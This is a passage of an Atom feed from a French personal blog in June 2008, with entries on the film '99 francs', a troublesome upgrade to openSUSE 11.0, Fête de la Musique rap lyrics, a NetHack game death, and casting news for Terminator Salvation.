Sur le principe c'est moins &lt;q&gt;nombriliste&lt;/q&gt; que &lt;em&gt;Bruce tout-puissant&lt;/em&gt;. Plutôt amusant, n'entre pas dans le vulgaire (on est loin des cacaprout du genre &lt;em&gt;BigMovie&lt;/em&gt;), c'est plein de &lt;q&gt;bonnes attentions&lt;/q&gt;... un film familial &lt;q&gt;tout public&lt;/q&gt; pour résumer et ma foi on en a vu des biens pires :p &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=60627.html&quot; hreflang=&quot;fr&quot;&gt;99 francs&lt;/a&gt;&lt;/strong&gt;&lt;br /&gt;
De &lt;em&gt;Jan Kounen&lt;/em&gt;, d'après le roman de &lt;em&gt;Frédéric Beigbeder&lt;/em&gt;, avec &lt;em&gt;Jean Dujardin&lt;/em&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;em&gt;Octave&lt;/em&gt; est au sommet de son &lt;q&gt;art&lt;/q&gt;, la publicité. Il travaille dans la plus grosse agance de pub, &lt;em&gt;Ross &amp;amp; Witchcraft&lt;/em&gt;. Pris dans un engrenage décadant à base d'argent, femmes et drogues, lui qui était si haut, si sûr de lui et de son rôle dans la société, va finir par sombrer et se dégouter de lui même avant de finalement décider de frapper un grand coup pour tout faire s'écrouler.&lt;br /&gt;
&lt;br /&gt;
Le film est à l'image de son personnage principal : très sophistiqué, chaque scène a l'air d'avoir été étudiée avec un soin tout particulier dans la mise en forme, l'objectif non dissimulé et d'exploiter les méthodes des publicitaires pour mieux les saccager, les exagérer jusqu'au ridicule, transformer des paroles agressives ou vulgaires en slogans commerciaux, ou injecter un élément destructeur dans une pub pronant la solidarité.&lt;br /&gt;
&lt;br /&gt;
Le sommet est atteint avec du yahourt mis en scène comme si c'était une bonne dose de foutre :D &lt;br /&gt;
Le réalisateur se fait (et nous fait) plaisir en détruisant la pub bien ringarde d'une barre chocolaté qui n'est pas sans rappeler les fameuses pubs &lt;em&gt;Kinder&lt;/em&gt; (vous savez, la fameuse famille à fils unique avec les coiffures d'une mode dépassée, dents blanches, look de bourges mais pas trop, coincés et propres sur eux à qui on donnerait des claques lol) ou encore en salissant un décor paradisiaque avec des paquets d'emballages.&lt;br /&gt;
&lt;br /&gt;
Le film donne aussi un bon tour d'horizon du monde publicitaire, les différents boulots (créateur artistique, rédacteur publicitaire, photographe etc), comment tout ça tourne et donne son point de vue sur ce qui fait la qualité d'un film publicitaire (un côté analytique assez intéressant).&lt;br /&gt;
&lt;br /&gt;
Notez qu'à chaque visionnage du film on peut remarquer certains détails comme le hamster défoncé à la coke qui courre dans un tarré en arrière plan dans sa roue :D &lt;br /&gt;
On note aussi la présence de vrais pubs (scène ou &lt;em&gt;Octave&lt;/em&gt; roule en &lt;em&gt;BMW&lt;/em&gt;, réunions où les gens tournent à &lt;em&gt;Volvic&lt;/em&gt;, créateur artistique sous &lt;em&gt;Apple&lt;/em&gt;, emballage &lt;em&gt;KFC&lt;/em&gt; sur le bureau, caméra numérique &lt;em&gt;Sony&lt;/em&gt;...)
Comme quoi, pub, anti-pub, ou anti-anti-pub, la morale est que tous les moyens sont permis pour nous faire acheter un produit et qu'on n'y échappera jamais. D'ailleurs peut-on réussir à faire un film sans laisser une marque s'introduire par inadvertance ? &lt;br /&gt;
&lt;br /&gt;
Dans tous les cas, c'est un très bon film, peut-être un peu déroutant au début mais intéressant et très critique tout en restant amusant.&lt;br /&gt;
&lt;br /&gt;
&lt;img src=&quot;http://img354.imageshack.us/img354/7282/99fkv5.png&quot; alt=&quot;99 Francs&quot; /&gt;&lt;br /&gt;
Attention ça va taper :D</content>
</entry>
<entry xml:lang="fr">
  <title>Mise à jour vers openSUSE 11.0</title>
  <link rel="alternate" type="text/html" href="http://devloop.lyua.org/blog/index.php?2008/06/21/515-mise-a-jour-vers-opensuse-110" />
  <issued>2008-06-21T17:44:19+00:00</issued>
  <modified>2008-06-21T17:44:19+00:00</modified>
  <id>http://devloop.lyua.org/blog/index.php?2008/06/21/515-mise-a-jour-vers-opensuse-110</id>
  <author><name>devloop</name></author>
  <dc:subject>Linux et logiciels libres</dc:subject>
  <summary>Récit d'un passage de openSUSE 10.3 à openSUSE 11.0, réussi mais non pas sans difficultés.

Comme d'habitude, et après avoir attendu l'annonce officielle de sa sortie, je me suis lancé dans le...</summary>
  <content type="text/html" mode="escaped"> &lt;img src=&quot;http://files.opensuse.org/opensuse/en/2/2d/Opensuse_2.gif&quot; alt=&quot;openSUSE logo&quot; style=&quot;float: left; margin-right: 5px;&quot; /&gt;Récit d'un passage de openSUSE 10.3 à openSUSE 11.0, réussi mais non pas sans difficultés.&lt;br /&gt;
&lt;br /&gt;
Comme d'habitude, et après avoir attendu l'annonce officielle de sa sortie, je me suis lancé dans le &lt;a href=&quot;http://software.opensuse.org/&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;téléchargement d'openSUSE&lt;/a&gt; 11.0.&lt;br /&gt;
Le téléchargement par torrent m'ayant pris toute une soirée (malgré le déblocage des &lt;q&gt;limites&lt;/q&gt; présentes par défaut dans &lt;em&gt;Azureus&lt;/em&gt;) à une vitesse oscillant entre 100 et 600 ko/s pour le DVD d'installation de 4.3Go, l'installation en elle-même a dû être repoussée à la soirée suivante :( &lt;br /&gt;
&lt;br /&gt;
Finalement j'insère la galette puis, confiant, redémarre sur le DVD sans avoir pris la moindre mesure supplémentaire (sauvegarde de données, configuration etc)&lt;br /&gt;
Cette fois l'installeur est tout neuf, il ne s'agit pas d'une simple retouche comme pour &lt;a href=&quot;http://devloop.lyua.org/blog/index.php?2007/10/06/473-opensuse-103-jy-suis&quot; hreflang=&quot;fr&quot;&gt;la dernière fois&lt;/a&gt; où on voyait encore des libellés de la version précédente.&lt;br /&gt;
&lt;br /&gt;
Les partitions chiffrées sont bien reconnues, le mot de passe est demandé pour le montage. En revanche un avertissement est donné pour la &lt;a href=&quot;http://devloop.lyua.org/blog/index.php?2008/04/06/503-creez-une-partition-temporaire-chiffree-sous-linux&quot; hreflang=&quot;fr&quot;&gt;partition temporaire chiffrée&lt;/a&gt; que je dis au système d'ignorer.&lt;br /&gt;
&lt;br /&gt;
On passe ensuite à l'installation des logiciels. Une liste de dépôts communautaires est proposé, la majorité des logiciels sont remplacés par ceux du DVD, d'autres rappatriés depuis les dépôts.&lt;br /&gt;
Quelques erreurs de dépendances sont relevées, &lt;em&gt;YaST&lt;/em&gt; propose différentes solutions pour corriger ces problèmes. Bizarrement pour chaque paquet où il a détecté une erreur, une des solutions proposée et d'installer des paquets par &lt;a href=&quot;http://packman.links2linux.org/&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;Packman&lt;/a&gt;. C'est assez surprenant car il ne s'agit pas d'un dépôt officiel et trop de paquets en provenance de tels dépôts peut transformer les mises à jours en un vrai casse-tête.&lt;br /&gt;
Je tiens à signaler qu'ils s'agissait de paquets normalement présents sur un DVD d'install d'une distribution Linux, dans mon cas j'ai dû me résigner à supprimer &lt;a href=&quot;http://www.directfb.org/&quot; hreflang=&quot;en&quot;&gt;DirectFB&lt;/a&gt; ainsi que &lt;em&gt;ImageMagick&lt;/em&gt;.&lt;br /&gt;
&lt;br /&gt;
Finalement après installation des paquets, je redémarre la machine. GRUB n'a pas l'air de savoir ce qu'il doit faire, aucun système d'exploitation n'est proposé.&lt;br /&gt;
Je redémarre avec le DVD d'installation, passe en mode réparation et lance une vérification des partitions et du boot loader. Finalement il effectue les opérations qu'il aurait dû faire précédemment.&lt;br /&gt;
Je note le passage à ntfs-3g pour les partitions Windows. Enfin une bonne nouvelle :) &lt;br /&gt;
Nouveau redémarrage... les partitions Windows ne sont pas proposées pour le démarrage (encore quelque chose qu'il faudra corriger) mais au moins je peux lancer openSUSE 11.0 sur le système :) &lt;br /&gt;
&lt;br /&gt;
A priori quelque chose s'est mal passé avec le framebuffer puisque la police de caractère utilisée pour afficher les messages kernel/initd est énorme et aucune mise en forme graphique n'est présente (pas le moindre penguin à l'horizon) contrairement à ce que j'avais avec la 10.3 :( &lt;br /&gt;
&lt;br /&gt;
Le serveur X se lance, aucune trace du logo &lt;em&gt;NVIDIA&lt;/em&gt; à l'écran... logique. Arrêt de X, passage en mode console, re-compilation du module et relance du serveur X : cette fois j'ai un écran noir persistant à la place du logo &lt;em&gt;NVIDIA&lt;/em&gt;.&lt;br /&gt;
Je récupère la dernière version du driver de la carte graphique sur le site officiel et recommence sans grande conviction. Effectivement pas de changements. Ca démarre très bien avec le module libre donc je remets à plus tard.&lt;br /&gt;
&lt;br /&gt;
Peu de surprises en ouvrant ma session KDE 4.0, le seul changement graphique est la nouvelle icône du menu principal. Par contre, première claque avec la nouvelle applet de mise à jour du système. Si l'aspect ne change pas, des améliorations plus que notables ont été faites sur le temps de vérification des mises à jour et sur l'utilisation mémoire. On en vient à se demander pourquoi l'ancienne version était si gourmande et lente.&lt;br /&gt;
&lt;br /&gt;
&lt;em&gt;YaST2&lt;/em&gt; a aussi changé, surtout pour le gestionnaire de paquets. On peut pas dire qu'il ait gagné dans les changements : moins beau, moins lisible et moins fonctionnel.&lt;br /&gt;
Première erreur, les paquets pouvant être mis à jour ne ressortent pas assez. Au lieu de surligner la ligne entière comme c'était le cas avec l'ancienne version, seule la colonne du numéro de version est mise en valeur.&lt;br /&gt;
Le second problème concerne les raccourcis clavier qui merdouillent (on est renvoyé au bas de l'affichage en voulant mettre à jour avec '&amp;gt;' alors qu'on n'a rien demandé).&lt;br /&gt;
&lt;br /&gt;
Après je n'ai pas rencontré de difficultées particulières, si ce n'est le nom &lt;q&gt;Azureus&lt;/q&gt; qui est devenu &lt;q&gt;Vuze&lt;/q&gt;, ce qui explique pourquoi je ne le trouvais pas dans les dépôts.&lt;br /&gt;
&lt;br /&gt;
Bref ça n'a pas été ma meilleure expérience en tant qu'utilisateur d'&lt;em&gt;openSUSE&lt;/em&gt;. Et je cherche toujours une solution pour le driver &lt;em&gt;NVIDIA&lt;/em&gt; :(</content>
</entry>
<entry xml:lang="fr">
  <title>L'Atelier - La Fête de la Musique</title>
  <link rel="alternate" type="text/html" href="http://devloop.lyua.org/blog/index.php?2008/06/21/514-latelier---la-fete-de-la-musique" />
  <issued>2008-06-21T13:57:10+00:00</issued>
  <modified>2008-06-21T13:57:10+00:00</modified>
  <id>http://devloop.lyua.org/blog/index.php?2008/06/21/514-latelier---la-fete-de-la-musique</id>
  <author><name>devloop</name></author>
  <dc:subject>Musique</dc:subject>
  <summary>Pour l'occasion, la radio a été vidée puis re-remplie. Pas mal de rock et de hip-hop, une goutte d'électro et de reggae. Une bonne dose de groupes français et quelques lives :) 
Bonne écoute...</summary>
  <content type="text/html" mode="escaped"> Pour l'occasion, &lt;a href=&quot;http://devloop.lyua.org/radio.blog/&quot;&gt;la radio&lt;/a&gt; a été vidée puis re-remplie. Pas mal de rock et de hip-hop, une goutte d'électro et de reggae. Une bonne dose de groupes français et quelques lives :) &lt;br /&gt;
Bonne écoute ;-) &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Tekilatex&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Est-ce que c'est la fête de la musique ou bien peut-être la fête de l'amnésie ?&lt;br /&gt;
Sors vite ta guitare acoustique et rend hommage à la &lt;em&gt;Russie&lt;/em&gt;&lt;br /&gt;
Bois une vodka et prend-toi pour un rappeur en chantant des poèmes de &lt;em&gt;Garcia Lorca&lt;/em&gt;&lt;br /&gt;
Et comme par enchantement tu deviens une rock star&lt;br /&gt;
Soudain c'est l'enchaînement des événements liés à ta déchéance&lt;br /&gt;
Et tu ne te sens pas à ta place à l'intérieur comme &lt;em&gt;Jean-Pierre Chevènement&lt;/em&gt;&lt;br /&gt;
Tu sombres dans l'alcoolisme, tu te complais dans ta connerie,&lt;br /&gt;
Et tu copules avec ta cousine, tu te jettes du haut de la colline&lt;br /&gt;
Voilà ! T'es fier de toi ? T'aurais dû rester à la maison !&lt;br /&gt;
Sortir dehors le 21 juin, ça sert à rien, rends-toi à la raison.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;James Delleck&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
La musique, je vais lui faire sa fête comme à une fan en fin de concert qui me chauffe au &lt;em&gt;Batofar&lt;/em&gt;&lt;br /&gt;
Au coin de la rue il y a pleins de guitares rockeuses qui me fatiguent l'oreille,&lt;br /&gt;
Aussi usées que le cul d'une hardeuse&lt;br /&gt;
Ça me saoule les crins-crins d'étudiants de &lt;em&gt;Paris&lt;/em&gt;&lt;br /&gt;
Et si ils jouent faux ils disent :&lt;br /&gt;
&lt;br /&gt;
&lt;q&gt;Mortel ! A la fin c’était jazzy&lt;/q&gt;&lt;br /&gt;
&lt;br /&gt;
Là je croise une pop-star amateur qui veut être le best&lt;br /&gt;
Genre foncedé comme un hamster coincé dans un crash-test&lt;br /&gt;
L'ambiance est chirdé au folk-n-roll&lt;br /&gt;
Alors je lui dis : &lt;q&gt;Mais non ! Je pelote pas ta meuf ! T'as ma parole !&lt;/q&gt;&lt;br /&gt;
En passant, je rappe sur un scène gothique&lt;br /&gt;
&lt;br /&gt;
&lt;q&gt;Ouille...&lt;/q&gt;&lt;br /&gt;
&lt;br /&gt;
Mais vu que j'ai déchiré, je vais me faire sucer par des gargouilles&lt;br /&gt;
22.06.01, je m'assoupis comme un gentil MC&lt;br /&gt;
Les bourses vides et les tympans pleins de bruit.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Fuzati&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
C'est la fête de la musique, mais comme à toutes les fêtes, je n'ai pas été invité&lt;br /&gt;
La musique ne m'a jamais aimé&lt;br /&gt;
Et moi qui croyait que ce concept n'appartenait qu'à mes parents, je suis déçu...&lt;br /&gt;
Avec les batraciens, je dois garder le dessus&lt;br /&gt;
J'ai l'impression que tout ce que je rappe est trop mortel mais pas toi, et c'est normal, tu n'as pas bu...&lt;br /&gt;
Comment veux-tu que les prostituées me donnent de l'amour si les distributeurs refusent de me donner de l'argent ?&lt;br /&gt;
Enfermé dans ma chambre, je pense aux gens, je vais vomir, je bande, je me branle, je vais me finir dans les toilettes&lt;br /&gt;
A cet instant, j'ai une révélation : le sperme de sidaïque porte à la fois la vie et la mort, je demeure fasciné&lt;br /&gt;
En cet instant, j'aimerais avoir le HIV&lt;br /&gt;
Mais pas pour trop longtemps&lt;br /&gt;
Après je l'échangerais pour quelque chose de plus amusant comme... un yoyo musical&lt;br /&gt;
Je regarderais ma femme se faire baiser avant de finir émasculé par de gentils skinheads homosexuels&lt;br /&gt;
3 fois 222, c'est le nombre de décibels&lt;br /&gt;
J'ai une chemise et des lunettes, ne me tapez pas...&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Cyanure&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Hey ! Ce soir c'est le bordel !&lt;br /&gt;
Sur les bords de la &lt;em&gt;Seine&lt;/em&gt; les djembés frappent un peu plus loin des MCs rappent, d'autres hystériques&lt;br /&gt;
S'excitent devant &lt;em&gt;Scorpion&lt;/em&gt; au bord des larmes à &lt;em&gt;République&lt;/em&gt;&lt;br /&gt;
Là où le grec-frites est à 25 francs sans frites&lt;br /&gt;
Canettes de coke à balles treize pendant que des pick-pockets se fondent dans la fumée des revendeurs illicites de sandwichs merguez&lt;br /&gt;
Le marché parallèle de la nourriture, la galère dans la ure&lt;br /&gt;
Après le dernier métro la moyenne basse des groupes qui assurent&lt;br /&gt;
Et les formations de guinguette aux soirées portes ouvertes devant les bars-rétro, c'est aussi cela la fête...&lt;br /&gt;
...Offi-ci-elle de la musique&lt;br /&gt;
Certains s'amusent, d'autres vident le stock de bières brunes renfloué le matin même par l'épicier malin du coin qui fera fortune contre couverture nocturne ce soir&lt;br /&gt;
Coincé à &lt;em&gt;Bastille&lt;/em&gt;, je ne peux me rendre chez &lt;em&gt;Para&lt;/em&gt; pour des raisons accessoires&lt;br /&gt;
Les autres ont bientôt fini leur partie... &lt;em&gt;Tek&lt;/em&gt; au tel m'a dit que le morceau nique, que rapper c'est magique,&lt;br /&gt;
Que le marteau-piqueur en regard du bruit que le son fait dans l'arrondissement&lt;br /&gt;
Je crois qu'il dit vrai, en tendant l'oreille c'est bien eux que j'entends.&lt;br /&gt;
Fête de la musique disaient-ils...&lt;br /&gt;</content>
</entry>
<entry xml:lang="fr">
  <title>YASD #2</title>
  <link rel="alternate" type="text/html" href="http://devloop.lyua.org/blog/index.php?2008/06/16/513-yasd-2" />
  <issued>2008-06-16T19:44:52+00:00</issued>
  <modified>2008-06-16T19:44:52+00:00</modified>
  <id>http://devloop.lyua.org/blog/index.php?2008/06/16/513-yasd-2</id>
  <author><name>devloop</name></author>
  <dc:subject>NetHack</dc:subject>
  <summary>devloop (Sam Hum Fem Law), 13888 points, killed by a gelatinous cube

Se faire tuer par un cube gélatineu ça peut faire rire... mais avant de vous moquer laissez moi vous raconter l'histoire de ma...</summary>
  <content type="text/html" mode="escaped"> &lt;q&gt;devloop (Sam Hum Fem Law), 13888 points, killed by a gelatinous cube&lt;/q&gt;&lt;br /&gt;
&lt;br /&gt;
Se faire tuer par un &lt;a href=&quot;http://nethack.wikia.com/wiki/Gelatinous_cube&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;cube gélatineu&lt;/a&gt; ça peut faire rire... mais avant de vous moquer laissez moi vous raconter l'histoire de ma samuraï.&lt;br /&gt;
&lt;br /&gt;
On ne peut pas dire que la chance était de mon côté : les quelques marchands que j'ai croisé étaient inintéressants et surtout je n'ai croisé aucun trône sur mon chemin qui auraient pû me permettre d'identifier les objets trouvés par çi par là (quelques armures et bottes qui auraient pourtant s'avérer plus qu'utiles).&lt;br /&gt;
Je ne vous parle même pas de cette feignasse de clébard qui m'a juste aidé à déterminer le &lt;a href=&quot;http://nethack.wikia.com/wiki/BUC&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;BUC&lt;/a&gt; d'un casque et d'une bague (dont la connaissance approfondie aurait peut-être pû m'éviter cette mort stupide) en tout début du partie.&lt;br /&gt;
&lt;br /&gt;
Au départ ça allait &lt;q&gt;comme-çi, comme-ça&lt;/q&gt;, pas de difficultés majeures et rien d'extraordinaire sur mon chemin... puis je suis descendu dans les mines.&lt;br /&gt;
Après avoir emprunté un chemin sinueux sur tombe sur la &lt;q&gt;team gnome&lt;/q&gt;. Je m'en tire bien, gagne en expérience, vais déposer mes gains quelques part, reprends le même couloir et tombe cette fois sur la &lt;q&gt;team snake&lt;/q&gt;... ça va encore.&lt;br /&gt;
Mais sur le chemin du retour, je me fais attaquer par la célèbre &lt;a href=&quot;http://nethack.wikia.com/wiki/Ant&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;team ant&lt;/a&gt;. Après en avoir exterminé une bonne partie, je prends la fuite tant bien que mal et atteins les escaliers in extremis avec seulement 3 points de vie ^_^&lt;br /&gt;
Revenu à l'étage supérieur, je glande un peu histoire de souffler puis prends les autres escaliers. J'y massacre quelques créatures en tout genre, fait le plein d'armes et armures que je laisse de côté pour une identification future.&lt;br /&gt;
Je voulais retourner chez un marchand malheureusement sur son chemin je croise la &lt;a href=&quot;http://nethack.wikia.com/wiki/Rothe&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;team rothe&lt;/a&gt;, suivie de près par une bande de d'orc zombies et quelques (encore) &lt;q&gt;giant ants&lt;/q&gt;.&lt;br /&gt;
Après avoir récupéré, je redescends dans les mines pour me taper une bonne tripotée de hill orcs qui se seront bien fait laminés :p &lt;br /&gt;
&lt;br /&gt;
Sur le chemin du retour et pour reprende le chemin &lt;q&gt;standard&lt;/q&gt; (sans passer par les mines), j'ai perdu un temps fou à jouer à cache-cache avec des nymphes et des leprechauns (saletés !)&lt;br /&gt;
Arrivé à ce stade, toujours rien d'intéressant : ni pioches, ni lock-pick... enfin aucun de ces petits bonheurs simples :( &lt;br /&gt;
La partie s'est continuée dans le même style : un moment je suis seul, le moment d'après ils me tombent tous dessus en même temps.&lt;br /&gt;
&lt;br /&gt;
Plus tard j'ai joué à cache-cache avec une bande de &lt;a href=&quot;http://nethack.wikia.com/wiki/Cockatrice&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;chickatrice&lt;/a&gt;, sauf que cette fois çi, c'était moi qui me cachait (j'avais pas de gants :( ). Et comme j'étais pris de &lt;q&gt;sauts&lt;/q&gt; de téléportation incontrôlés, c'était pour le moins comique... on se serait cru dans &lt;em&gt;Benny Hill&lt;/em&gt; :D &lt;br /&gt;
&lt;br /&gt;
Arrivé finalement au niveau de l'Oracle, je prends un chemin longeant la salle principale et tombe sur un cube gélatineu. Automatiquement, je prends du recul pour décocher mon arc et mes flèches et lui mettre dans sa gueule sauf que derrière moi se trouvait une licorne grise... N'étant pas suicidaire, je préfère revenir près du cube qui lui s'était rapproché (saleté !).&lt;br /&gt;
La licorne étant partie, je tente de reculer une nouvelle fois mais un singe a fait son apparition et me tape dessus. Je me retrouve finalement coincé entre ce foutu cube et cet £#%*\!+ de singe. Le singe a le temps de donner 6 coups quand l'espèce de gelée en donne un seul... cela n'empèche pas que le coup fatal, celui compatibilisé, a été donné par le cube :( &lt;br /&gt;
&lt;br /&gt;
Le pire étant de savoir après coup (c'est le cas de le dire) que l'anneau que je portait sur l'une de mes mains était &lt;a href=&quot;http://nethack.wikia.com/wiki/Free_action&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;un anneau d'action libre&lt;/a&gt;. Bref le cube j'aurais pû y mettre sa race ou plus simplement ne pas trop m'en soucier et ça aurait été bien mieux :( &lt;br /&gt;
&lt;br /&gt;
Bilan : &lt;a href=&quot;http://www.alt.org/nethack/player-top.php?player=devloop&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;6ème meilleur de mes scores&lt;/a&gt; à l'heure de ces lignes, ce qui est plutôt satisfaisant, sauf que finir tué par un cube de gelée après avoir exterminé une légion entière d'orcs ça craint un peu.&lt;br /&gt;
J'ai aussi explosé mon record récemment avec un moine (pour ne pas changer) :)</content>
</entry>
<entry xml:lang="fr">
  <title>Des nouvelles du Terminator</title>
  <link rel="alternate" type="text/html" href="http://devloop.lyua.org/blog/index.php?2008/06/13/512-des-nouvelles-du-terminator" />
  <issued>2008-06-13T18:43:14+00:00</issued>
  <modified>2008-06-13T18:43:14+00:00</modified>
  <id>http://devloop.lyua.org/blog/index.php?2008/06/13/512-des-nouvelles-du-terminator</id>
  <author><name>devloop</name></author>
  <dc:subject>Cinéma</dc:subject>
  <summary>Si vous êtes comme moi un grand fan de la trilogie Terminator, vous êtes très probablement déjà au courant qu'une nouvelle trilogie est un préparation.
Du moins, ce dont l'on est sûr à...</summary>
  <content type="text/html" mode="escaped"> &lt;img src=&quot;http://farm1.static.flickr.com/164/418641836_e76f2c77a1_m.jpg&quot; alt=&quot;Terminator&quot; style=&quot;float: right; margin-left: 5px;&quot; /&gt;Si vous êtes comme moi un grand fan de la trilogie &lt;em&gt;Terminator&lt;/em&gt;, vous êtes très probablement déjà au courant qu'&lt;a href=&quot;http://www.allocine.fr/article/fichearticle_gen_carticle=18402337.html&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;une nouvelle trilogie&lt;/a&gt; est un préparation.&lt;br /&gt;&lt;br /&gt;
Du moins, ce dont l'on est sûr à l'heure actuelle est qu'un quatrième épisode est en cours, baptisé &lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=57405.html&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;Terminator Salvation: The Future Begins&lt;/a&gt;.&lt;br /&gt;
Le scénario de cet épisode se centrera sur la mise en place de la résistance contre les machines en l'an 2018.&lt;br /&gt;
&lt;br /&gt;
Le rôle principal sera tenu par le génialissime &lt;a href=&quot;http://www.allocine.fr/personne/fichepersonne_gen_cpersonne=8471.html&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;Christian Bale&lt;/a&gt; qui tiendra le rôle du chef de la résistance &lt;em&gt;John Connor&lt;/em&gt;.&lt;br /&gt;
Et pour ce qui est de vous donner des maux de têtes, les scénaristes ont décidé d'intégrer le personnage de &lt;em&gt;Kyle Reese&lt;/em&gt; incarné par un jeune acteur nommé &lt;a href=&quot;http://www.allocine.fr/personne/fichepersonne_gen_cpersonne=60517&amp;amp;nopub=1.html&quot; hreflang=&quot;fr&quot;&gt;Anton Yelchin&lt;/a&gt;.&lt;br /&gt;
&lt;em&gt;Kyle Reese&lt;/em&gt; qui est (pour ceux qui ne suivent pas), le père de &lt;em&gt;John Connor&lt;/em&gt; revenu du futur pour sauver &lt;em&gt;Sarah Connor&lt;/em&gt; du &lt;em&gt;Terminator&lt;/em&gt; dans le premier épisode, le tout sur les ordres de &lt;em&gt;John Connor&lt;/em&gt; lui même :p &lt;br /&gt;
&lt;br /&gt;
Malgré ce qui avait été annoncé au début, &lt;a href=&quot;http://www.allocine.fr/article/fichearticle_gen_carticle=18422477.html&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;ce n'est pas Charlotte Gainsbourg&lt;/a&gt; qui tiendra la rôle de &lt;em&gt;Kate Connor&lt;/em&gt;, la femme de &lt;em&gt;John&lt;/em&gt;. On avait eu l'occasion de découvrir le personnage dans &lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=26840.html&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;Terminator 3 : le soulèvement des machines&lt;/a&gt; sous son nom de jeune fille, &lt;em&gt;Kate Brewster&lt;/em&gt; (alors interprétée par &lt;a href=&quot;http://www.allocine.fr/personne/fichepersonne_gen_cpersonne=12444.html&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;Claire Danes&lt;/a&gt;.&lt;br /&gt;
&lt;a href=&quot;http://www.allocine.fr/article/fichearticle_gen_carticle=18422973.html&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;C'est finalement l'actrice &lt;em&gt;Bryce Dallas Howard&lt;/em&gt;&lt;/a&gt; qui décroche le ponpon, &lt;em&gt;Charlotte Gainsbourg&lt;/em&gt; étant apparemment occupée par un film français :( &lt;br /&gt;
&lt;br /&gt;
Pour ce qui est de l'apparition d'&lt;em&gt;Arnold Schwarzenegger&lt;/em&gt; dans le film, rien n'est confirmé à l'heure actuelle, même si l'on sait par le 3ème opus que &lt;em&gt;John Connor&lt;/em&gt; est normalement terminé par un &lt;em&gt;T-101&lt;/em&gt; (modèle construit par le société &lt;em&gt;Cyberdyne&lt;/em&gt;).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Quand à la série TV &lt;a href=&quot;http://www.allocine.fr/series/ficheserie_gen_cserie=3242.html&quot; hreflang=&quot;fr&quot;&gt;Terminator : The Sarah Connor Chronicles&lt;/a&gt;, on attend toujours avec impatience la seconde saison dans laquelle la sublime &lt;a href=&quot;http://en.wikipedia.org/wiki/Shirley_Manson&quot; hreflang=&quot;en&quot;&gt;Shirley Manson&lt;/a&gt;, la chanteuse de &lt;em&gt;Garbage&lt;/em&gt;, &lt;a href=&quot;http://www.allocine.fr/article/fichearticle_gen_carticle=18422763.html&quot; hreflang=&quot;fr&quot;&gt;devrait tenir le rôle d'une certaine &lt;em&gt;Catherine Weaver&lt;/em&gt;&lt;/a&gt;, directrice d'une certaine entreprise baptisée &lt;em&gt;Cyberdyne&lt;/em&gt; :p &lt;br /&gt;
&lt;br /&gt;
Pour résumer, on a par ordre chronologique :&lt;br /&gt;&lt;ol&gt;
 &lt;li&gt;Terminator&lt;/li&gt;
 &lt;li&gt;Terminator 2 : Le Jugement Dernier&lt;/li&gt;
 &lt;li&gt;Terminator : The Sarah Connor Chronicles (série TV)&lt;/li&gt;
 &lt;li&gt;Terminator 3 : Le Soulèvement des Machines&lt;/li&gt;
 &lt;li&gt;Terminator Salvation: The Future Begins&lt;/li&gt;
&lt;/ol&gt;
On ne sait pas si la mort de &lt;em&gt;Sarah Connor&lt;/em&gt; (normalement d'une leucémie en 1997) sera un jour traitée, la série TV étant chronologiquement la mieux plaçée pour s'en occuper. Dans tous les cas félicitations aux différents scénaristes qui parviennent malgré tout à être cohérents dans ce labyrinthe de dates (surtout que la série en rajoute avec un déplacement dans le temps à un moment :D ) &lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://en.wikipedia.org/wiki/Terminator_Salvation:_The_Future_Begins&quot; hreflang=&quot;en&quot;&gt;D'après Wikipedia&lt;/a&gt;, on devrait avoir un premier teaser de l'épisode 4 en avant première des diffusions de &lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=115362.html&quot; hreflang=&quot;fr&quot;&gt;The Dark Knight&lt;/a&gt;, le prochain &lt;em&gt;Batman&lt;/em&gt; avec &lt;em&gt;Christian Bale&lt;/em&gt; dans le rôle principal (sortie aout 2008 en &lt;em&gt;France&lt;/em&gt;) :)</content>
</entry>
<entry xml:lang="fr">
  <title>YASD #1</title>
  <link rel="alternate" type="text/html" href="http://devloop.lyua.org/blog/index.php?2008/06/10/511-yasd-1" />
  <issued>2008-06-10T21:59:31+00:00</issued>
  <modified>2008-06-10T21:59:31+00:00</modified>
  <id>http://devloop.lyua.org/blog/index.php?2008/06/10/511-yasd-1</id>
  <author><name>devloop</name></author>
  <dc:subject>NetHack</dc:subject>
  <summary>Yet Another Stupid Death dans le langage des joueurs de NetHack.

J'étais pourtant bien parti avec ma barbare (chaotic female human Barbarian). Les coups de poisse et de chance s'alternaient mais...</summary>
